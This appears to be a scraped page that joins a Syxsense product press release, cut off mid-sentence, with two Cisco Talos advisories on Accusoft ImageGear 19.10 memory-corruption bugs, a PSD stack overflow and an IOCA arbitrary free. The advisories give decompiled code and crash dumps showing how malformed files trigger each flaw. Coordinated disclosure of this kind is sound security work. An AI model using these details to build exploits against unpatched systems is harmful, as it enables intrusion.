Syxsense Enterprise delivers real-time vulnerability monitoring and remediation for all endpoints across an organization’s entire network.

**ALISO VIEJO, Calif**. – \[May 3, 2022\] – Syxsense, a global leader in IT and security management solutions, today announced Syxsense Enterprise™, the world’s first IT management and endpoint security solution that delivers real-time vulnerability monitoring and instant remediation for every endpoint across an organization’s entire network environment. Syxsense Enterprise combines Syxsense Secure, Manage, and Mobile Device Manager to deliver a completely unified platform that scans and manages all endpoints, resolves problems in real-time, and reduces the risks associated with system misconfigurations. This enables organizations to better predict, identify, and remediate vulnerabilities.

“As threats get more complex, it’s important that IT teams have consolidated solutions for IT management and endpoint security. Syxsense Enterprise is designed to give them a centralized cloud-based platform for scanning, patching, recognizing, and remediating vulnerabilities that could lead to attack or exploitation of endpoints,” said Ashley Leonard, Founder and CEO at Syxsense. “By offering our customers a unified cloud solution, we enable complete control over every endpoint device on the network so they can secure business-critical resources quickly and streamline security operations.”

Syxsense Enterprise is the industry’s first Unified Security and Endpoint Management (USEM) solution that addresses the three key elements of endpoint security – vulnerabilities, patch, and compliance. It layers on a powerful workflow automation tool called Syxsense Cortex™ that remediates and eliminates endpoint security weaknesses – all through a single cloud-based, drag and drop management interface, with hundreds of prebuilt workflows. This includes the ability to identify software vulnerabilities in both OS and 3rd party applications, misconfigurations from open ports, disabled firewalls, ineffective user account polices and more. 

It also includes Syxsense’s recently launched Mobile Device Management (MDM) solution, which allows IT to manage devices running on iOS, iPadOS, and Android, in addition to previously supported Windows, Linux and Mac environments. Syxsense MDM includes all the tools necessary for Device Enrollment, Inventory and Configuration Management, Application Deployment and Rollback, Data Containerization, and Remote Device Lock/Reset/Wipe (making it possible for IT to wipe sensitive data from lost or stolen devices). 

“As the market shifts to a hybrid workforce, the number of endpoints is growing exponentially, with corporate network connected mobile endpoints soaring,” said Charles Kolodgy, principal at advisory firm Security Mindsets. “The need to manage and secure an increasing number of endpoints, including desktops, mobile phones and other devices, is becoming more apparent every day as sophisticated threats grow exponentially. Syxsense Enterprise is offering a solution that solves the need to both secure and manage a vast collection of endpoints. The key is the ability to scan for vulnerabilities and patch without losing business continuity.”

The key features of Syxsense Enterprise include:

*   Vulnerability Scanning – Prevent cyberattacks by identifying scanning authorization issues, security implementation problems, and antivirus status. 
*   Patch Everything – Automatically deploy OS and third-party patches to remediate all endpoint vulnerabilities inside the network and on roaming devices outside the network.
*   Prove Compliance and Device Health – Document patching with reporting for risk assessments, vulnerable devices, task summaries and more. And scan and prioritize patching relative to risk exposure.
*   Quarantine Devices – Block communication for an infected device, isolate endpoints, and kill malicious processes before they impact the network. 
*   Control All Mobile Devices – Oversee devices remotely, silently push OTA configurations, applications, and policies from iOS to Android to Windows and more.
*   Collaborate with Ease – IT and security teams can now collaborate in a single console to identify and close endpoint attack vectors quickly. 

For more details or to schedule a demo, visit: https://www.syxsense.com/gc-demo-syxsense

**About Syxsense**

Syxsense is a leading provider of innovative, intuitive endpoint security and management technology that combines the power of artificial intelligence with industry expertise to help customers predict and remove security threats across all devices including mobile. Syxsense is the first unified security and endpoint management platform that centralizes the three key elements of endpoint security management (vulnerabilities, patch and compliance) and layers on a powerful workflow automation tool called Syxsense Cortex,™ all through a single cloud-based platform, enabling greater efficiency and collaboration between teams. The always-on technology performs in real-time so businesses can operate free of disruption from security breaches that cripple productivity and expose them to financial risk and reputational harm. For more information, visit www.syxse

Syxsense Launches Unified Endpoint Security and Management Platform

A stack-based buffer overflow vulnerability exists in the IGXMPXMLParser::parseDelimiter functionality of Accusoft ImageGear 19.10. A specially-crafted PSD file can overflow a stack buffer, which could either lead to denial of service or, depending on the application, to an information leak. An attacker can provide a malicious file to trigger this vulnerability.

**Summary**

A stack-based buffer overflow vulnerability exists in the IGXMPXMLParser::parseDelimiter functionality of Accusoft ImageGear 19.10. A specially-crafted PSD file can overflow a stack buffer, which could either lead to denial of service or, depending on the application, to an information leak. An attacker can provide a malicious file to trigger this vulnerability.

**Tested Versions**

Accusoft ImageGear 19.10

**Product URLs**

ImageGear - https://www.accusoft.com/products/imagegear-collection/

**CVSSv3 Score**

7.1 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H

**CWE**

CWE-193 - Off-by-one Error

**Details**

The ImageGear library is a document-imaging developer toolkit that offers image conversion, creation, editing, annotation and more. It supports more than 100 formats such as DICOM, PDF, Microsoft Office and others.

Trying to load a malformed PSD file, we end up with the following situation:

    (758.8fc): C++ EH exception - code e06d7363 (first chance)
    ModLoad: 75590000 75610000   C:\Windows\SysWOW64\uxtheme.dll
    
    STATUS_STACK_BUFFER_OVERRUN encountered
    (758.8fc): Break instruction exception - code 80000003 (first chance)
    eax=00000000 ebx=711732c8 ecx=76ae01c0 edx=0018ea2d esi=00000000 edi=000039ac
    eip=76adffa1 esp=0018ec74 ebp=0018ecf0 iopl=0         nv up ei pl zr na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
    kernel32!UnhandledExceptionFilter+0x5f:
    76adffa1 cc              int     3
    

This kind of error STATUS_STACK_BUFFER_OVERRUN indicates an abnormal program termination. Looking at the call stack may indicate the culprit.

    0:000> kb
    ChildEBP RetAddr  Args to Child              
    0018ecf0 71ace2d9 711732c8 0018ed0c 7110c698 kernel32!UnhandledExceptionFilter+0x5f
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\Talos Vrt Team\ImageGearFuzzing\bin\igCore19d.dll - 
    0018ecfc 7110c698 711732c8 00000001 0018f03c MSVCR110!__crtUnhandledException+0x14
    WARNING: Stack unwind information not available. Following frames may be wrong.
    0018ed0c 7110c7af 711732c8 029c02d0 029c95e0 igCore19d!IG_GUI_page_title_set+0x3c5e8
    0018f03c 71089a04 029c76bd 029c3f8a 4848482f igCore19d!IG_GUI_page_title_set+0x3c6ff
    0018f150 7108950c 029c0150 0018f1e8 029c0348 igCore19d!IG_mpi_page_set+0x12d9d4
    0018f16c 7108966f 029c765d 000039ac 00000001 igCore19d!IG_mpi_page_set+0x12d4dc
    0018f1b8 7109003d 0018fc54 029c0150 00000000 igCore19d!IG_mpi_page_set+0x12d63f
    0018f670 7104cd0b 0018fc54 1000001e 029c0348 igCore19d!IG_mpi_page_set+0x13400d
    0018f738 7104c242 0018fc54 1000001e 029c0098 igCore19d!IG_mpi_page_set+0xf0cdb
    0018f774 7104bcba 0018fc54 0018f79c 0018f7c4 igCore19d!IG_mpi_page_set+0xf0212
    0018fbcc 70f313d9 0018fc54 029c0060 00000001 igCore19d!IG_mpi_page_set+0xefc8a
    0018fc04 70f708d7 00000000 029c0060 0018fc54 igCore19d!IG_image_savelist_get+0xb29
    0018fe80 70f70239 00000000 00308230 00000001 igCore19d!IG_mpi_page_set+0x148a7
    0018fea0 70f05757 00000000 00308230 00000001 igCore19d!IG_mpi_page_set+0x14209
    *** WARNING: Unable to verify checksum for Fuzzme.exe
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for Fuzzme.exe - 
    0018fec0 00402219 00308230 0018fed4 00000001 igCore19d!IG_load_file+0x47
    0018fed8 00402524 00308230 0018ff10 003079a8 Fuzzme!fuzzme+0x19
    0018ff40 0040668d 00000005 003066a8 003079a8 Fuzzme!fuzzme+0x324
    0018ff88 76aa33ca 7efde000 0018ffd4 77d19ed2 Fuzzme!fuzzme+0x448d
    0018ff94 77d19ed2 7efde000 7741e483 00000000 kernel32!BaseThreadInitThunk+0xe
    0018ffd4 77d19ea5 00406715 7efde000 00000000 ntdll!__RtlUserThreadStart+0x70
    0018ffec 00000000 00406715 7efde000 00000000 ntdll!_RtlUserThreadStart+0x1b
    

Investigating the callback stack leads us to the function pointed by igCore19d!IG_mpi_page_set+0x12d9d4, which points to the end to the following pseudo code function at LINE165 pointed by the call to security_check_cookie :

    LINE1   void __thiscall IGXMPXMLParser::FUN_74239720(IGXMPXMLParser *this)
    LINE2   {
    LINE3     char cVar1;
    LINE4     void *pvVar2;
    LINE5     code *pcVar3;
    LINE6     bool bVar4;
    LINE7     int iVar5;
    LINE8     int iVar6;
    LINE9     char *pcVar7;
    LINE10    char *pcVar8;
    LINE11    char *pcVar9;
    LINE12    char *local_10c;
    LINE13    char buffer_ovw [256];
    LINE14    uint stack_canary;
    LINE15    
    LINE16    stack_canary = DAT_7435cea8 ^ (uint)&stack0xfffffffc;
    LINE17    pcVar7 = this->field2_0x8;
    LINE18    pcVar9 = pcVar7 + this->field3_0xc;
    LINE19    bVar4 = false;
    LINE20    this->field10_0x1c = pcVar7;
    LINE21    pcVar8 = pcVar7;
    LINE22    while (pcVar8 < pcVar9) {
    LINE23      cVar1 = *(char *)this->field10_0x1c;
    [...]
    LINE48      else if (cVar1 == '<') {
    [...]
    LINE91                      /* ---------------------------------------------------------------------------
    LINE92                          */
    LINE93        iVar5 = parseDelimiter(this,(char (*) [256])buffer_ovw);
    LINE94                      /* ---------------------------------------------------------------------------
    LINE95                          */
    [...]
    LINE161     this->field10_0x1c = this->field10_0x1c + 1;
    LINE162     pcVar8 = (char *)this->field10_0x1c;
    LINE163   }
    LINE165   security_check_cookie(stack_canary ^ (uint)&stack0xfffffffc);
    LINE166   return;
    LINE167 }
    

So this indicates to us that somehow the stack_canary declared at LINE14, which is initialized LINE16, has been overwritten along the flow of this function. After investigation, it appears the stack_canary is overwritten during the call to the parseDelimiter at LINE93, which takes as a parameter the variable buffer_ovw declared at LINE13 just before the stack_canary.

Below is the parseDelimiter pseudo-code:

    LINE168 void __thiscall IGXMPXMLParser::parseDelimiter(IGXMPXMLParser *this,char (*buffer_ovw) [256])
    LINE169 {
    LINE170   bool bVar1;
    LINE171   int *piVar2;
    LINE172   char (*target_buffer) [256];
    LINE173   int index;
    LINE174   bool bVar3;
    LINE175   int local_410;
    LINE176   int local_40c;
    LINE177   char string_buffer [1024];
    LINE178   uint stack_cookie;
    LINE179   
    LINE180   stack_cookie = DAT_7435cea8 ^ (uint)&stack0xfffffffc;
    LINE181   index = 0;
    LINE182   bVar1 = false;
    LINE183   bVar3 = *(char *)this->field10_0x1c == '/';
    LINE184   if (bVar3) {
    LINE185     (*buffer_ovw)[0] = '/';
    LINE186     this->field10_0x1c = this->field10_0x1c + 1;
    LINE187   }
    LINE188   target_buffer = (char (*) [256])(*buffer_ovw + bVar3);
    LINE189   while (index < 256) {
    LINE190     switch(*(char *)this->field10_0x1c) {
    LINE191     case '\t':
    LINE192     case '\n':
    LINE193     case '\r':
    LINE194     case ' ':
    LINE195     case '/':
    LINE196     case '>':
    LINE197       *(char *)target_buffer = '\0';
    LINE198       this->field10_0x1c = this->field10_0x1c + -1;
    LINE199       bVar1 = true;
    LINE200       break;
    LINE201     default:
    LINE202       *(char *)target_buffer = *(char *)this->field10_0x1c;
    LINE203       target_buffer = (char (*) [256])((int)target_buffer + 1);
    LINE204       index = index + 1;
    LINE205     }
    LINE206     this->field10_0x1c = this->field10_0x1c + 1;
    LINE207     if (bVar1) {
    LINE208       security_check_cookie(stack_cookie ^ (uint)&stack0xfffffffc);
    LINE209       return;
    LINE210     }
    LINE211   }
    LINE212   if (this->field21_0x50 != 0) {
    LINE213     index = this->field31_0x78;
    LINE214     local_40c = this->field10_0x1c - (int)this->field2_0x8;
    LINE215     local_410 = 0;
    LINE216     if (0 < index) {
    LINE217       piVar2 = (int *)this->field30_0x74;
    LINE218       do {
    LINE219         if (local_40c < *piVar2) break;
    LINE220         local_410 = local_410 + 1;
    LINE221         piVar2 = piVar2 + 1;
    LINE222       } while (local_410 < index);
    LINE223     }
    LINE224     if (local_410 < index) {
    LINE225       local_40c = *(int *)((int)this->field30_0x74 + local_410 * 4) - local_40c;
    LINE226     }
    LINE227     else {
    LINE228       local_40c = 0;
    LINE229     }
    LINE230     if (this->field38_0x88 == 2) {
    LINE231       local_40c = local_40c * 2;
    LINE232     }
    LINE233     strncpy(string_buffer,"Tag name exceed max character count",0x400);
    LINE234     (*(code *)this->field21_0x50)
    LINE235               (this,"C:\\BuildAgent\\work\\76e9801d497051a9\\Source\\Common\\Inc_prv\\xmlparser.cpp"
    LINE236                ,0x12f,&local_410);
    LINE237   }
    LINE238   security_check_cookie(stack_cookie ^ (uint)&stack0xfffffffc);
    LINE239   return;
    LINE240 }
    

Looking through the parameter buffer_ovw, we can observe the code is impacting the table in two places: LINE185 and LINE188. In LINE185, we see it depends on the boolean variable bVar3, which is set to true when some specific char is found in LINE183. The side effect of this boolean check isthat it impacts the shift to the start of target_buffer LINE188, as it’s added to buffer_ovw by one byte.  
We observe then a while loop starting LINE189 with a hardcoded constant of 256, which is supposed to prevent the overflow of the destination buffer buffer_ovw.  
But the code is not taking into account the boolean positive result shift and overflows the buffer_ovw if the default case is observed for more than 256 bytes.

The condition to make this happen depends on the PSD file records contained, identified as XMP metadata.  
This leads to a denial-of-service caused by the security_check_cookie. However, depending on how the Imagegear SDK is employed in an application, this could also lead to leaking 1 byte from the canary.

**Crash Information**

    0:000> !analyze -v
    *******************************************************************************
    *                                                                             *
    *                        Exception Analysis                                   *
    *                                                                             *
    *******************************************************************************
    
    FAULTING_IP: 
    kernel32!UnhandledExceptionFilter+5f
    76adffa1 cc              int     3
    
    EXCEPTION_RECORD:  711ae3e0 -- (.exr 0x711ae3e0)
    ExceptionAddress: 71089a04 (igCore19d!IG_mpi_page_set+0x0012d9d4)
       ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
      ExceptionFlags: 00000001
    NumberParameters: 1
       Parameter[0]: 00000002
    
    CONTEXT:  711ae430 -- (.cxr 0x711ae430;r)
    eax=00000000 ebx=029c0150 ecx=8a712c18 edx=00000100 esi=000000a1 edi=000039ac
    eip=71089a04 esp=0018f044 ebp=0018f150 iopl=0         nv up ei pl zr na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
    igCore19d!IG_mpi_page_set+0x12d9d4:
    71089a04 8be5            mov     esp,ebp
    Last set context:
    eax=00000000 ebx=029c0150 ecx=8a712c18 edx=00000100 esi=000000a1 edi=000039ac
    eip=71089a04 esp=0018f044 ebp=0018f150 iopl=0         nv up ei pl zr na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
    igCore19d!IG_mpi_page_set+0x12d9d4:
    71089a04 8be5            mov     esp,ebp
    Resetting default scope
    
    FAULTING_THREAD:  000008fc
    
    PROCESS_NAME:  Fuzzme.exe
    
    ERROR_CODE: (NTSTATUS) 0x80000003 - {EXCEPTION}  Breakpoint  A breakpoint has been reached.
    
    EXCEPTION_CODE: (HRESULT) 0x80000003 (2147483651) - One or more arguments are invalid
    
    EXCEPTION_PARAMETER1:  00000000
    
    NTGLOBALFLAG:  470
    
    APPLICATION_VERIFIER_FLAGS:  0
    
    APP:  fuzzme.exe
    
    ANALYSIS_VERSION: 6.3.9600.17336 (debuggers(dbg).150226-1500) x86fre
    
    BUGCHECK_STR:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME
    
    PRIMARY_PROBLEM_CLASS:  STACK_BUFFER_OVERRUN
    
    DEFAULT_BUCKET_ID:  STACK_BUFFER_OVERRUN
    
    LAST_CONTROL_TRANSFER:  from 7108950c to 71089a04
    
    STACK_TEXT:  
    WARNING: Stack unwind information not available. Following frames may be wrong.
    0018f150 7108950c 029c0150 0018f1e8 029c0348 igCore19d!IG_mpi_page_set+0x12d9d4
    0018f16c 7108966f 029c765d 000039ac 00000001 igCore19d!IG_mpi_page_set+0x12d4dc
    0018f1b8 7109003d 0018fc54 029c0150 00000000 igCore19d!IG_mpi_page_set+0x12d63f
    0018f670 7104cd0b 0018fc54 1000001e 029c0348 igCore19d!IG_mpi_page_set+0x13400d
    0018f738 7104c242 0018fc54 1000001e 029c0098 igCore19d!IG_mpi_page_set+0xf0cdb
    0018f774 7104bcba 0018fc54 0018f79c 0018f7c4 igCore19d!IG_mpi_page_set+0xf0212
    0018fbcc 70f313d9 0018fc54 029c0060 00000001 igCore19d!IG_mpi_page_set+0xefc8a
    0018fc04 70f708d7 00000000 029c0060 0018fc54 igCore19d!IG_image_savelist_get+0xb29
    0018fe80 70f70239 00000000 00308230 00000001 igCore19d!IG_mpi_page_set+0x148a7
    0018fea0 70f05757 00000000 00308230 00000001 igCore19d!IG_mpi_page_set+0x14209
    0018fec0 00402219 00308230 0018fed4 00000001 igCore19d!IG_load_file+0x47
    0018fed8 00402524 00308230 0018ff10 003079a8 Fuzzme!fuzzme+0x19
    0018ff40 0040668d 00000005 003066a8 003079a8 Fuzzme!fuzzme+0x324
    0018ff88 76aa33ca 7efde000 0018ffd4 77d19ed2 Fuzzme!fuzzme+0x448d
    0018ff94 77d19ed2 7efde000 7741e483 00000000 kernel32!BaseThreadInitThunk+0xe
    0018ffd4 77d19ea5 00406715 7efde000 00000000 ntdll!__RtlUserThreadStart+0x70
    0018ffec 00000000 00406715 7efde000 00000000 ntdll!_RtlUserThreadStart+0x1b
    
    
    FOLLOWUP_IP: 
    igCore19d!IG_mpi_page_set+12d9d4
    71089a04 8be5            mov     esp,ebp
    
    SYMBOL_STACK_INDEX:  0
    
    SYMBOL_NAME:  igcore19d!IG_mpi_page_set+12d9d4
    
    FOLLOWUP_NAME:  MachineOwner
    
    MODULE_NAME: igCore19d
    
    IMAGE_NAME:  igCore19d.dll
    
    DEBUG_FLR_IMAGE_TIMESTAMP:  60aceda9
    
    STACK_COMMAND:  .cxr 0x711ae430 ; kb
    
    FAILURE_BUCKET_ID:  STACK_BUFFER_OVERRUN_80000003_igCore19d.dll!IG_mpi_page_set
    
    BUCKET_ID:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_MISSING_GSFRAME_igcore19d!IG_mpi_page_set+12d9d4
    
    ANALYSIS_SOURCE:  UM
    
    FAILURE_ID_HASH_STRING:  um:stack_buffer_overrun_80000003_igcore19d.dll!ig_mpi_page_set
    
    FAILURE_ID_HASH:  {e0459bbd-9052-42e3-75ad-df79bbfa6dcb}
    
    Followup: MachineOwner
    ---------
    

**Vendor Response**

ImageGear Pro v20.0 release

Windows: https://download.accusoft.com/imagegear/pro/ImageGear\_for\_C\_and\_CPP\_v20.0.exe Linux: https://download.accusoft.com/imagegear/pro/unix/ImageGear\_for\_C\_Cpp20.0.0-Linux64.tar.gz

Documentation Windows: http://help.accusoft.com/ImageGear/v20.0/Windows/DLL/webframe.html Linux: http://help.accusoft.com/ImageGear/v20.0/Linux/webframe.html

https://download.accusoft.com/imagegear/pro/ImageGear\_for\_C\_and\_CPP\_v20.0.exe

**Timeline**

2022-02-07 - Vendor disclosure  
2022-04-29 - Vendor patched  
2022-05-02 - Public Release  

Discovered by Emmanuel Tacheau of Cisco Talos.

CVE-2022-23400: TALOS-2022-1465 || Cisco Talos Intelligence Group

A memory corruption vulnerability exists in the ioca_mys_rgb_allocate functionality of Accusoft ImageGear 19.10. A specially-crafted malformed file can lead to an arbitrary free. An attacker can provide a malicious file to trigger this vulnerability.

**Summary**

A memory corruption vulnerability exists in the ioca\_mys\_rgb\_allocate functionality of Accusoft ImageGear 19.10. A specially-crafted malformed file can lead to an arbitrary free. An attacker can provide a malicious file to trigger this vulnerability.

**Tested Versions**

Accusoft ImageGear 19.10

**Product URLs**

ImageGear - https://www.accusoft.com/products/imagegear-collection/

**CVSSv3 Score**

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-131 - Incorrect Calculation of Buffer Size

**Details**

The ImageGear library is a document-imaging developer toolkit that offers image conversion, creation, editing, annotation and more. It supports more than 100 formats such as DICOM, PDF, Microsoft Office and others.

Trying to load a malformed IOCA file, we end up with the following situation:

    (1bf4.175c): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    verifier_71920000!AVrfpDphFindBusyMemoryNoCheck+0xb8:
    71928758 813abbbbcdab    cmp     dword ptr [edx],0ABCDBBBBh ds:002b:d0d0d0a0=????????
    

When looking at the call stack, we can observe the crash is happening during the free process as detailed below:

    STACK_TEXT:  
    0019f310 71928875     04d71000 d0d0d0c0 00000000 verifier_71920000!AVrfpDphFindBusyMemoryNoCheck+0xb8
    0019f334 71928ae0     04d71000 d0d0d0c0 0019f3c4 verifier_71920000!AVrfpDphFindBusyMemory+0x15
    0019f350 7192aad0     04d71000 d0d0d0c0 04d70000 verifier_71920000!AVrfpDphFindBusyMemoryAndRemoveFromBusyList+0x20
    0019f36c 7739f966     04d70000 01000002 d0d0d0c0 verifier_71920000!AVrfDebugPageHeapFree+0x90
    0019f3d4 77303d46     d0d0d0c0 3b0d5201 00000000 ntdll_772c0000!RtlDebugFreeHeap+0x3e
    0019f530 7734791d     00000000 d0d0d0c0 d0d0d0c0 ntdll_772c0000!RtlpFreeHeap+0xd6
    0019f58c 77303c16     00000000 00000000 00000000 ntdll_772c0000!RtlpFreeHeapInternal+0x783
    0019f5ac 7146dac2     04d70000 00000000 d0d0d0c0 ntdll_772c0000!RtlFreeHeap+0x46
    0019f5c0 71606b22     d0d0d0c0 00000000 09b60fa8 MSVCR110!free+0x1a
    0019f5d4 715ed0a3     00000000 0bd49ff0 98cbb32c igCore19d!IG_comm_is_comp_exist+0x4ad2
    0019f608 7164d641     0f83cfe0 00000000 0d0c4ff0 igCore19d!GPb_image_associate+0xd33
    0019f62c 7162a14e     0019fdb0 0b44aff8 00000000 igCore19d!IG_mpi_page_set+0x11611
    0019f64c 716dc57d     0019fc3c 0b44aff8 00000000 igCore19d!IG_cpm_profiles_reset+0xf03e
    0019f674 716e271b     0019fc3c 1000001f 1271f000 igCore19d!IG_mpi_page_set+0xa054d
    0019f708 716e0cc0     0019fc3c 1000001f 0afa2ff8 igCore19d!IG_mpi_page_set+0xa66eb
    0019fbb4 716113d9     0019fc3c 0afa2ff8 00000001 igCore19d!IG_mpi_page_set+0xa4c90
    0019fbec 716508d7     00000000 0afa2ff8 0019fc3c igCore19d!IG_image_savelist_get+0xb29
    0019fe68 71650239     00000000 0019ff10 00000001 igCore19d!IG_mpi_page_set+0x148a7
    0019fe88 715e5757     00000000 0019ff10 00000001 igCore19d!IG_mpi_page_set+0x14209
    0019fea8 00402219     0019ff10 0019febc 00000001 igCore19d!IG_load_file+0x47
    0019fec0 00402524     0019ff10 0019fef8 052e2f48 Fuzzme!fuzzme+0x19
    0019ff28 0040668d     00000005 052dcf78 052e2f48 Fuzzme!fuzzme+0x324
    0019ff70 7514fa29     00353000 7514fa10 0019ffdc Fuzzme!fuzzme+0x448d
    0019ff80 77327a9e     00353000 3b0d58ed 00000000 KERNEL32!BaseThreadInitThunk+0x19
    0019ffdc 77327a6e     ffffffff 77348a68 00000000 ntdll_772c0000!__RtlUserThreadStart+0x2f
    0019ffec 00000000     00406715 00353000 00000000 ntdll_772c0000!_RtlUserThreadStart+0x1b
    

Inspecting the argument indicates the parameter to free() is not a valid address: 0xd0d0d0c0.  
Tracing back through the call stack leads us to the function IGDIBRunEnds::delete_table_mys_rbg_ptr with the following pseudo code:

    LINE1  void __thiscall IGDIBRunEnds::delete_table_mys_rbg_ptr(IGDIBRunEnds *this,int pixpos,int some_buffer)
    LINE2  {
    LINE3    if (this->mys_RGB != (mys_RGB *)this->table_mys_rgb[pixpos]) {
    LINE4       operator_delete((mys_RGB *)this->table_mys_rgb[pixpos]);
    LINE5    }
    LINE6    if (some_buffer == 0) {
    LINE7       some_buffer = (int)this->mys_RGB;
    LINE8    }
    LINE9    this->table_mys_rgb[pixpos] = some_buffer;
    LINE10   this->field_0x48 = 1;
    LINE11   return;
    LINE12 }
    

The free is corresponding to the operator_delete called in LINE4, which is indexed by pixpos to delete a specific element.

When looking at how this is constructed, the table_mys_rgb object in this case lands in the following code:

    LINE13 void __thiscall IGDIBRunEnds::FUN_743f6aa0(IGDIBRunEnds *this)
    LINE14 {  
    LINE15   if (this->table_mys_rgb == (dword *)0x0) {
    LINE16     size_to_allocate = this->size_Y * 4;
    LINE17     buffer = (dword *)operator_new(-(uint)((int)(size_to_allocate >> 0x20) != 0) |
    LINE18                                    (uint)size_to_allocate);
    LINE19     if (this->table_mys_rgb != buffer) {
    LINE20       operator_delete(this->table_mys_rgb);
    LINE21       this->table_mys_rgb = buffer;
    LINE22     }
    LINE23     size_y = this->size_Y;
    LINE24     while (size_y != 0) {
    LINE25       size_y = size_y - 1;
    LINE26       this->table_mys_rgb[size_y] = (dword)this->mys_RGB;
    LINE27     }
    LINE28   }
    LINE29   return;
    LINE30 }
    

So we can see the allocation in LINE17, followed by a while loop between LINE24 and LINE27 to fill the memory allocated. Now the issue is happening when size_Y read from the file is null, thus the allocation of buffer becomes uncontrolled and a zero byte allocation is made in LINE17, returned by a malloc null operation. Thus the while loop (LINE24) is not processed and the flow continues without initializing any element in table_mys_rgb. When the thread reaches the function IGDIBRunEnds::delete_table_mys_rbg_ptr, even with a null pixpos value, the pointer at table_mys_rgb[0] (which is not initialized, since table_mys_rgb has a size of 0) is freed via operator_delete, possibly leading to an arbitrary free.

**Crash Information**

    0:000:x86> !analyze -v
    *******************************************************************************
    *                                                                             *
    *                        Exception Analysis                                   *
    *                                                                             *
    *******************************************************************************
    
    
    KEY_VALUES_STRING: 1
    
        Key  : AV.Fault
        Value: Read
    
        Key  : Analysis.CPU.mSec
        Value: 1905
    
        Key  : Analysis.DebugAnalysisManager
        Value: Create
    
        Key  : Analysis.Elapsed.mSec
        Value: 34355
    
        Key  : Analysis.Init.CPU.mSec
        Value: 5030
    
        Key  : Analysis.Init.Elapsed.mSec
        Value: 119236
    
        Key  : Analysis.Memory.CommitPeak.Mb
        Value: 123
    
        Key  : Timeline.OS.Boot.DeltaSec
        Value: 1162
    
        Key  : Timeline.Process.Start.DeltaSec
        Value: 84
    
        Key  : WER.OS.Branch
        Value: vb_release
    
        Key  : WER.OS.Timestamp
        Value: 2019-12-06T14:06:00Z
    
        Key  : WER.OS.Version
        Value: 10.0.19041.1
    
        Key  : WER.Process.Version
        Value: 1.0.1.1
    
    
    NTGLOBALFLAG:  2000000
    
    PROCESS_BAM_CURRENT_THROTTLED: 0
    
    PROCESS_BAM_PREVIOUS_THROTTLED: 0
    
    APPLICATION_VERIFIER_FLAGS:  0
    
    APPLICATION_VERIFIER_LOADED: 1
    
    EXCEPTION_RECORD:  (.exr -1)
    ExceptionAddress: 71928758 (verifier_71920000!AVrfpDphFindBusyMemoryNoCheck+0x000000b8)
       ExceptionCode: c0000005 (Access violation)
      ExceptionFlags: 00000000
    NumberParameters: 2
       Parameter[0]: 00000000
       Parameter[1]: d0d0d0a0
    Attempt to read from address d0d0d0a0
    
    FAULTING_THREAD:  0000175c
    
    PROCESS_NAME:  Fuzzme.exe
    
    READ_ADDRESS:  d0d0d0a0 
    
    ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
    
    EXCEPTION_CODE_STR:  c0000005
    
    EXCEPTION_PARAMETER1:  00000000
    
    EXCEPTION_PARAMETER2:  d0d0d0a0
    
    STACK_TEXT:  
    0019f310 71928875     04d71000 d0d0d0c0 00000000 verifier_71920000!AVrfpDphFindBusyMemoryNoCheck+0xb8
    0019f334 71928ae0     04d71000 d0d0d0c0 0019f3c4 verifier_71920000!AVrfpDphFindBusyMemory+0x15
    0019f350 7192aad0     04d71000 d0d0d0c0 04d70000 verifier_71920000!AVrfpDphFindBusyMemoryAndRemoveFromBusyList+0x20
    0019f36c 7739f966     04d70000 01000002 d0d0d0c0 verifier_71920000!AVrfDebugPageHeapFree+0x90
    0019f3d4 77303d46     d0d0d0c0 3b0d5201 00000000 ntdll_772c0000!RtlDebugFreeHeap+0x3e
    0019f530 7734791d     00000000 d0d0d0c0 d0d0d0c0 ntdll_772c0000!RtlpFreeHeap+0xd6
    0019f58c 77303c16     00000000 00000000 00000000 ntdll_772c0000!RtlpFreeHeapInternal+0x783
    0019f5ac 7146dac2     04d70000 00000000 d0d0d0c0 ntdll_772c0000!RtlFreeHeap+0x46
    0019f5c0 71606b22     d0d0d0c0 00000000 09b60fa8 MSVCR110!free+0x1a
    WARNING: Stack unwind information not available. Following frames may be wrong.
    0019f5d4 715ed0a3     00000000 0bd49ff0 98cbb32c igCore19d!IG_comm_is_comp_exist+0x4ad2
    0019f608 7164d641     0f83cfe0 00000000 0d0c4ff0 igCore19d!GPb_image_associate+0xd33
    0019f62c 7162a14e     0019fdb0 0b44aff8 00000000 igCore19d!IG_mpi_page_set+0x11611
    0019f64c 716dc57d     0019fc3c 0b44aff8 00000000 igCore19d!IG_cpm_profiles_reset+0xf03e
    0019f674 716e271b     0019fc3c 1000001f 1271f000 igCore19d!IG_mpi_page_set+0xa054d
    0019f708 716e0cc0     0019fc3c 1000001f 0afa2ff8 igCore19d!IG_mpi_page_set+0xa66eb
    0019fbb4 716113d9     0019fc3c 0afa2ff8 00000001 igCore19d!IG_mpi_page_set+0xa4c90
    0019fbec 716508d7     00000000 0afa2ff8 0019fc3c igCore19d!IG_image_savelist_get+0xb29
    0019fe68 71650239     00000000 0019ff10 00000001 igCore19d!IG_mpi_page_set+0x148a7
    0019fe88 715e5757     00000000 0019ff10 00000001 igCore19d!IG_mpi_page_set+0x14209
    0019fea8 00402219     0019ff10 0019febc 00000001 igCore19d!IG_load_file+0x47
    0019fec0 00402524     0019ff10 0019fef8 052e2f48 Fuzzme!fuzzme+0x19
    0019ff28 0040668d     00000005 052dcf78 052e2f48 Fuzzme!fuzzme+0x324
    0019ff70 7514fa29     00353000 7514fa10 0019ffdc Fuzzme!fuzzme+0x448d
    0019ff80 77327a9e     00353000 3b0d58ed 00000000 KERNEL32!BaseThreadInitThunk+0x19
